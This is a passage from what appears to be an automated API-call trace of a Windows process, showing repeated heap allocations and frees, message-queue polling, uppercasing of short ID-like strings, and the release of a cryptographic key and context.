Size=0x8) returned 0x24b1758 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0268.048] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.048] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.048] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0268.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0268.049] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.049] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.049] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.049] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.050] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.050] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.050] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.050] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.050] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.050] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.051] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.051] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.051] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0268.051] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.051] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0268.051] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.051] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0268.052] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.052] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.052] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0268.052] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.052] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.052] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.053] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0268.053] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0268.053] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.054] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.054] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.054] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.054] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0268.054] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.054] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.055] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.055] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.055] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.057] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.057] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.057] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.057] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.057] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.058] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.058] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.058] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.058] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.058] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0268.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0268.059] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.059] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.059] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0268.059] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.059] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0268.059] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.060] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.060] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0268.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0268.060] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0268.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: 